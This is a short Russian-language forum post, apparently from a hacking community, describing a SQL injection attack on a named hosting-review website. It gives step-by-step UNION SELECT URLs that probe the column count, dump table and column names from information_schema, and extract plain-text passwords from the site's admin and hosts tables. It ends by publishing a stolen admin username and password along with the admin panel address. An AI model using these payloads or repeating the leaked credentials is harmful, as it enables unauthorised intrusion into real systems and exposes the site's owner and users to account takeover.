ещё один бажный сайт.....хостинг
Проверяем
Код:
http://www.webhostingjury.com/hosts.php?id=-534'
имеем ошибкку, и узнаем что имееЦЦо 3 поля, одно принтабельно -
2
Код:
http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,2,3--
Версия Мускуля 5-я
знач обращаемся к нашей информационной таблице information_schema
Код:
http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3+from+information_schema.columns--
ждём пока выведутся все поля и таблицы...
находим нас интересующие, а именно:
admin:::adm_username - имя админского юзера
admin:::adm_password - пароль в открытом виде
или
hosts:::username - имя юзера(хоста)
hosts::: password - пароли в чистом виде
Код:
http://www.webhostingjury.com
/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,adm_password,adm_username),3+from+admin--
http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,password,username),3+from+hosts--
я брал админа.
получаем:
imkool:::ajay
Конечный итог:
Admin Username:
ajay
Admin Password:
imkool
Админка:
http://www.webhostingjury.com./adm/www/admin/index.php
---
...но почему-то не проходит инфа в админке...
логин юзеров не искал....